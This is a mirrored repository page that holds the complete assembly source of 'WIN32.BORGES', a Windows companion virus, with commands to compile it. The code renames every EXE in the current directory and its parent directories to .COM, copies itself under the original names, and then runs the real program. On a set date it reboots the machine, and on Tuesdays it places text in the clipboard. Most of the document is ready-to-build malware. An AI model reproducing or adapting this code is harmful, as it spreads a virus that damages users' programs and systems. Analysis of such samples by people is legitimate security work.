mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-18 16:25:28 +00:00
214 lines
6.0 KiB
NASM
214 lines
6.0 KiB
NASM
; ----------------> WIN32.BORGES Virus by Int13h/IKX <-----------------;
|
||
; It mirrores EXEs files, navegates directories with the famous dot-dot;
|
||
; method, on september 19 reboots the machine; on tuesdays puts a text;
|
||
; in the clipboard. This beast works using API for all its operations,;
|
||
; no dirty tricks are used. Just to mantain compatibility :);
|
||
; Dedicated to Jorge Luis Borges, because the first tale of his book;
|
||
; named "The book of sand" is called "The other", and it speaks about;
|
||
; an encounter with a younger copy of himself. The famous doppelganger.;
|
||
; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - cd13- -;
|
||
; ;
|
||
; COMPILATION: ;
|
||
; tasm32 /ml /m3 borges.asm,,; ;
|
||
; tlink32 /Tpe /aa /c /v borges.obj,,, import32.lib, ;
|
||
;
|
||
|
||
.386
|
||
.model flat
|
||
locals
|
||
|
||
extrn FindFirstFileA:PROC
|
||
extrn FindNextFileA:PROC
|
||
extrn SetCurrentDirectoryA:PROC
|
||
extrn GetCurrentDirectoryA:PROC
|
||
extrn GetSystemTime:PROC
|
||
extrn MoveFileA:PROC
|
||
extrn CopyFileA:PROC
|
||
extrn GlobalAlloc:PROC
|
||
extrn GlobalLock:PROC
|
||
extrn GlobalUnlock:PROC
|
||
extrn OpenClipboard:PROC
|
||
extrn SetClipboardData:PROC
|
||
extrn EmptyClipboard:PROC
|
||
extrn CloseClipboard:PROC
|
||
extrn GetCommandLineA:PROC
|
||
extrn CreateProcessA:PROC
|
||
extrn lstrcpyA:PROC
|
||
extrn MessageBoxA:PROC
|
||
extrn ExitWindowsEx:PROC
|
||
extrn ExitProcess:PROC
|
||
|
||
.DATA
|
||
|
||
TituloVentana db 'WIN32.BORGES VIRUS by Int13h/IKX',0
|
||
TextoVentana db 'Made in Paraguay, South America',0
|
||
MemHandle dd 0
|
||
Victimas db '*.EXE',0
|
||
SearcHandle dd 0
|
||
Longitud dd 0
|
||
ProcessInfo dd 4 dup (0)
|
||
StartupInfo dd 4 dup (0)
|
||
Win32FindData dd 0,0,0,0,0,0,0,0,0,0,0
|
||
Hallado db 200 dup (0)
|
||
Crear db 200 dup (0)
|
||
ParaCorrer db 200 dup (0)
|
||
Original db 200 dup (0)
|
||
Actual db 200 dup (0)
|
||
PuntoPunto db '..',0
|
||
SystemTimeStruc dw 0,0,0,0,0,0,0,0
|
||
|
||
|
||
.CODE
|
||
|
||
BORGES: mov eax,offset SystemTimeStruc
|
||
push eax
|
||
call GetSystemTime
|
||
|
||
mov ax,word ptr offset [SystemTimeStruc+2]
|
||
cmp al,9
|
||
jne NoFQVbirthday
|
||
|
||
mov ax,word ptr offset [SystemTimeStruc+6]
|
||
cmp al,17
|
||
je Adios
|
||
|
||
NoFQVbirthday:
|
||
push offset Original
|
||
push 000000C8h
|
||
call GetCurrentDirectoryA
|
||
mov dword ptr [Longitud],eax
|
||
|
||
call GetCommandLineA
|
||
push eax
|
||
push offset ParaCorrer
|
||
call lstrcpyA
|
||
|
||
mov edi,eax
|
||
Buscar: cmp byte ptr [edi],'.'
|
||
jz ElPunto
|
||
inc edi
|
||
jmp Buscar
|
||
ElPunto:mov esi,edi
|
||
inc esi
|
||
add edi,4
|
||
mov byte ptr [edi],00
|
||
|
||
Carrousell:
|
||
call InfectDirectory
|
||
push offset PuntoPunto
|
||
call SetCurrentDirectoryA
|
||
push offset Actual
|
||
push 000000C8h
|
||
call GetCurrentDirectoryA
|
||
cmp eax,dword ptr [Longitud]
|
||
je Salida
|
||
mov dword ptr [Longitud],eax
|
||
jmp Carrousell
|
||
|
||
InfectDirectory:
|
||
push offset Win32FindData
|
||
push offset Victimas
|
||
call FindFirstFileA
|
||
mov dword ptr [SearcHandle],eax
|
||
Ciclo: cmp eax,-1
|
||
je Salida
|
||
or eax,eax
|
||
jnz Continuar
|
||
ret
|
||
|
||
Continuar:
|
||
push offset Hallado
|
||
push offset Crear
|
||
call lstrcpyA
|
||
|
||
mov edi,offset Crear
|
||
SeguirBuscando:
|
||
cmp byte ptr [edi],'.'
|
||
jz PuntoEncontrado
|
||
inc edi
|
||
jmp SeguirBuscando
|
||
PuntoEncontrado:
|
||
inc edi
|
||
mov dword ptr [edi],0004d4f43h
|
||
|
||
push offset Crear
|
||
push offset Hallado
|
||
call MoveFileA
|
||
|
||
push 0
|
||
push offset Hallado
|
||
push offset ParaCorrer+1
|
||
call CopyFileA
|
||
|
||
push offset Win32FindData
|
||
push dword ptr [SearcHandle]
|
||
call FindNextFileA
|
||
jmp Ciclo
|
||
|
||
FillClipboard:
|
||
push 0
|
||
call OpenClipboard
|
||
call EmptyClipboard
|
||
push (offset TextoVentana-offset TituloVentana)
|
||
push 00000002 ; GMEM_MOVEABLE
|
||
call GlobalAlloc
|
||
push eax
|
||
mov dword ptr [MemHandle],eax
|
||
call GlobalLock
|
||
push eax
|
||
push offset TituloVentana
|
||
push eax
|
||
call lstrcpyA
|
||
call GlobalUnlock
|
||
push dword ptr [MemHandle]
|
||
push 00000001 ; CF_TEXT
|
||
call SetClipboardData
|
||
call CloseClipboard
|
||
jmp Run4theNight
|
||
|
||
Adios: push 00000001
|
||
push offset TituloVentana
|
||
push offset TextoVentana
|
||
push 0
|
||
call MessageBoxA
|
||
|
||
push 0
|
||
push 00000002 ; EWX_REBOOT
|
||
call ExitWindowsEx
|
||
|
||
|
||
Salida: push offset Original
|
||
call SetCurrentDirectoryA
|
||
|
||
mov ax,word ptr offset [SystemTimeStruc+4]
|
||
cmp al,2
|
||
je FillClipboard
|
||
|
||
Run4theNight:
|
||
push offset ProcessInfo
|
||
push offset StartupInfo
|
||
sub eax,eax
|
||
push eax
|
||
push eax
|
||
push 00000010h
|
||
push eax
|
||
push eax
|
||
push eax
|
||
call GetCommandLineA
|
||
inc eax
|
||
push eax
|
||
|
||
Done: mov dword ptr [esi],0004d4f43h
|
||
push offset ParaCorrer+1
|
||
call CreateProcessA
|
||
push 0
|
||
call ExitProcess
|
||
|
||
Ends
|
||
End BORGES
|
||
|
||
|
||
|
||
|
||
|